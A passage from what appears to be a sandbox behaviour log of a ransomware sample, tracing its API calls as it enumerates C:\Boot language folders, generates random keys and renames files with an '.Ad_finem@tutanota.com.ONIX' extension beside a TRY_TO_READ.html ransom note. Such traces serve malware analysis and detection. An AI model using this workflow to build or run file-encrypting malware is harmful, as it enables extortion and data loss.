lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x3096e970, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e3f0 [0065.439] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.439] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.439] GetLastError () returned 0x0 [0065.439] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.440] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cdd8 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e430 [0065.440] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e430 | out: hHeap=0x410000) returned 1 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.440] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.440] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cdd8 | out: hHeap=0x410000) returned 1 [0065.440] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.440] FindNextFileW (in: hFindFile=0x48e3f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x3096e970, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.440] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.440] GetLastError () returned 0x0 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.440] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cdd8 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e430 [0065.440] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e430 | out: hHeap=0x410000) returned 1 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.440] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.440] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cdd8 | out: hHeap=0x410000) returned 1 [0065.440] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.440] FindNextFileW (in: hFindFile=0x48e3f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.440] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.440] GetLastError () returned 0x0 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cdd8 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.440] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.440] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.440] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cdd8 | out: hHeap=0x410000) returned 1 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48cc78 [0065.440] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4666a8 [0065.440] CreateFileW (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.441] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.441] CreateFileW (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.441] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.441] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48cc78 | out: pbBuffer=0x48cc78) returned 1 [0065.441] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4666a8 | out: pbBuffer=0x4666a8) returned 1 [0065.441] SetFileAttributesW (lpFileName="C:\\\\Boot\\it-IT\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.441] lstrlenW (lpString="C:\\\\Boot\\it-IT\\bootmgr.exe.mui") returned 30 [0065.441] GetProcessHeap () returned 0x410000 [0065.441] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.441] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\it-IT\\bootmgr.exe.mui") returned="C:\\\\Boot\\it-IT\\bootmgr.exe.mui" [0065.441] lstrcatW (in: lpString1="C:\\\\Boot\\it-IT\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\it-IT\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.441] GetProcessHeap () returned 0x410000 [0065.441] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.441] CloseHandle (hObject=0xffffffff) returned 0 [0065.441] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.441] FindNextFileW (in: hFindFile=0x48e3f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3096e970, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3096e970, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.441] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.441] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.441] GetLastError () returned 0x6 [0065.442] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.442] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.442] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.442] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.442] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.442] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.442] FindNextFileW (in: hFindFile=0x48e3f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3096e970, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3096e970, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.442] CloseHandle (hObject=0x3cc) returned 1 [0065.442] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.442] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x51)) [0065.442] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.442] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.442] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.442] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\ja-JP9c354ca09c354b444c.lock") returned 37 [0065.443] CreateFileW (lpFileName="C:\\\\Boot\\ja-JP9c354ca09c354b444c.lock" (normalized: "c:\\boot\\ja-jp9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.443] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.443] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.443] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.443] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.443] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ce28 | out: hHeap=0x410000) returned 1 [0065.443] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ce50 | out: hHeap=0x410000) returned 1 [0065.443] FindFirstFileW (in: lpFileName="C:\\\\Boot\\ja-JP\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x3096e970, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e430 [0065.443] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.443] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.443] GetLastError () returned 0x0 [0065.443] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.443] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.443] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ce28 [0065.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e470 [0065.444] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e470 | out: hHeap=0x410000) returned 1 [0065.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.444] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.444] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ce28 | out: hHeap=0x410000) returned 1 [0065.444] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.444] FindNextFileW (in: hFindFile=0x48e430, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x3096e970, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.444] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.444] GetLastError () returned 0x0 [0065.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.444] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ce28 [0065.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e470 [0065.444] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e470 | out: hHeap=0x410000) returned 1 [0065.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.444] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.444] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ce28 | out: hHeap=0x410000) returned 1 [0065.444] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.444] FindNextFileW (in: hFindFile=0x48e430, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.444] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.444] GetLastError () returned 0x0 [0065.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ce28 [0065.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.444] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.444] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.444] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ce28 | out: hHeap=0x410000) returned 1 [0065.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48cd80 [0065.444] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4666b8 [0065.444] CreateFileW (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.445] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.445] CreateFileW (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.445] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.445] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48cd80 | out: pbBuffer=0x48cd80) returned 1 [0065.445] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4666b8 | out: pbBuffer=0x4666b8) returned 1 [0065.445] SetFileAttributesW (lpFileName="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.445] lstrlenW (lpString="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui") returned 30 [0065.445] GetProcessHeap () returned 0x410000 [0065.445] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.445] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui") returned="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui" [0065.445] lstrcatW (in: lpString1="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\ja-JP\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.445] GetProcessHeap () returned 0x410000 [0065.445] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.445] CloseHandle (hObject=0xffffffff) returned 0 [0065.445] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.445] FindNextFileW (in: hFindFile=0x48e430, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3096e970, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3096e970, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.445] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.445] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.445] GetLastError () returned 0x6 [0065.445] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.446] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.446] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.446] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.446] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.446] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.446] FindNextFileW (in: hFindFile=0x48e430, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3096e970, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3096e970, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.446] CloseHandle (hObject=0x3cc) returned 1 [0065.446] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.446] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x60)) [0065.446] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.446] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.446] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.447] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\ko-KR9c354ca09c354b444c.lock") returned 37 [0065.447] CreateFileW (lpFileName="C:\\\\Boot\\ko-KR9c354ca09c354b444c.lock" (normalized: "c:\\boot\\ko-kr9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.447] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.447] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.447] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.447] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.447] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ce78 | out: hHeap=0x410000) returned 1 [0065.447] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cea0 | out: hHeap=0x410000) returned 1 [0065.447] FindFirstFileW (in: lpFileName="C:\\\\Boot\\ko-KR\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x3096e970, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e470 [0065.448] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.448] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.448] GetLastError () returned 0x0 [0065.448] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.448] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.448] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.448] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ce78 [0065.448] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x48e4b0 [0065.448] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48e4b0 | out: hHeap=0x410000) returned 1 [0065.448] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.448] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.448] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ce78 | out: hHeap=0x410000) returned 1 [0065.448] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.448] FindNextFileW (in: hFindFile=0x48e470, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x3096e970, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3096e970, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.448] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.448] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.448] GetLastError () returned 0x0 [0065.448] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, 